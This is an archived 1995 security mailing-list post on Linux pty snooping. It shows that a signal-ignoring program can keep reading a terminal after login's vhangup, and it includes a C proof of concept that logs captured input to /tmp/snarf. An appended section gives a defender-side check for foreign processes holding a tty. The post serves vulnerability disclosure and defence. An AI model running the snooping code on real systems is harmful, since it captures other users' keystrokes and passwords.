
List:       best-of-security
Subject:    BoS: linux tty surfing
From:       Julian Assange <proff () suburbia ! net>
Date:       1995-09-26 13:07:49

-----BEGIN PGP SIGNED MESSAGE-----


Hi all,

I've done some more testing on this, and got the following results
with 1.2.10 (yeah, I'm not really on the bleeding edge):

        * telnetd as of NetKit-0.5 does not protect you from anyone
          snooping on your pty. I guess we know that by now.
          There's some code in sys_term.c that does a vhangup on the
          pty, but it's commented out for Linux. The comment says that
          this appears to be buggy.

        * Using login from util-linux-2.2 helps a bit. If you do a
          cat /dev/ttyp0, it will terminate once login is executed by
          telnetd. That's because login *does* do a vhangup.

        * Unfortunately, this is not the end of it. I experimented
          a little, and found that a program that ignores all signals
          *and* makes the pty its controlling tty will happily live on,
          and is still able to read data from it. I'm including it
          below.

          What I do not understand is why this does not make telnetd
          fail when doing an ioctl(TIOCSCTTY). Anyone more familiar with
          this stuff may be able to shed some light on this (Ted?).

Olaf
- --
Olaf Kirch         |  --- o --- Nous sommes du soleil we love when we play
okir@monad.swb.de  |    / | \   sol.dhoop.naytheet.ah kin.ir.samse.qurax
             For my PGP public key, finger okir@brewhq.swb.de.
- ------------------------------------------------------------------
/*
 * simple test program for. Not my usual standard of coding...
 */
#include <stdio.h>
#include <unistd.h>
#include <signal.h>
#include <termios.h>
#include <sys/types.h>
#include <sys/ioctl.h>
#include <fcntl.h>

int
main(int argc, char **argv)
{
        char    buffer[256];
        FILE    *fp;
        int     fd, i, n;

        /* the pty device to open is the only argument */
        if (argc < 2)
                return 2;
        /* drop every inherited descriptor, then start a new session */
        for (i = 0; i < 256; i++)
                close(i);
        setsid();
        if ((fd = open(argv[1], O_RDWR)) < 0) {
                perror("open");
                return 2;
        }
        /* make the pty our controlling tty */
        if (ioctl(fd, TIOCSCTTY, NULL) < 0)
                perror("ioctl");
        if ((fp = fopen("/tmp/snarf", "w")) == NULL)
                return 2;
        /* ignore all signals */
        for (i = 0; i < 32; i++)
                signal(i, SIG_IGN);
        while ((n = read(fd, buffer, 255)) > 0) {
                buffer[n] = 0;
                fprintf(fp, "got %s\n", buffer);
        }
        perror("read");
        return 2;
}

--


did I say, "dumb."
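
A defender-side check for the situation described in the message, where a process that opened the pty earlier keeps reading from it after login's vhangup. This is an added example, not part of the original post: it walks the per-process fd symlinks of a Linux /proc-style tree and counts processes that hold a given tty open but are not owned by the session's user. The function names, the proc_root parameter and the /dev/pts path in the usage note are assumptions made here.

```c
#define _POSIX_C_SOURCE 200809L
#include <dirent.h>
#include <limits.h>
#include <stdio.h>
#include <string.h>
#include <sys/stat.h>
#include <unistd.h>

/* 1 if any descriptor listed under <pid_dir>/fd is a symlink to tty. */
static int holds_tty(const char *pid_dir, const char *tty)
{
    char dir[PATH_MAX], target[PATH_MAX];
    struct dirent *e;
    int found = 0;
    DIR *d;

    snprintf(dir, sizeof dir, "%s/fd", pid_dir);
    if ((d = opendir(dir)) == NULL)
        return 0;                   /* exited, or not ours to inspect */
    while (!found && (e = readdir(d)) != NULL) {
        /* readlinkat() fails on "." and ".."; its result is not NUL-ended */
        ssize_t n = readlinkat(dirfd(d), e->d_name, target, sizeof target);
        found = n > 0 && (size_t)n == strlen(tty) && !memcmp(target, tty, n);
    }
    closedir(d);
    return found;
}

/* Count holders of tty not owned by session_uid; first max pids go to pids[]. */
int foreign_tty_holders(const char *proc_root, const char *tty,
                        uid_t session_uid, long *pids, int max)
{
    char path[PATH_MAX];
    struct dirent *e;
    struct stat st;
    long pid;
    int count = 0;
    DIR *d = opendir(proc_root);
    if (d == NULL)
        return -1;                  /* proc_root unreadable */
    while ((e = readdir(d)) != NULL) {
        if (sscanf(e->d_name, "%ld", &pid) != 1)
            continue;               /* only numeric entries are pids */
        snprintf(path, sizeof path, "%s/%ld", proc_root, pid);
        if (stat(path, &st) == 0 && st.st_uid != session_uid &&
            holds_tty(path, tty) && count++ < max)
            pids[count - 1] = pid;
    }
    closedir(d);
    return count;
}
```

On a live system the call would be foreign_tty_holders("/proc", "/dev/pts/3", uid, pids, 16), run with enough privilege to read other users' fd directories; a non-zero result at session start means some other account already has the terminal open.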
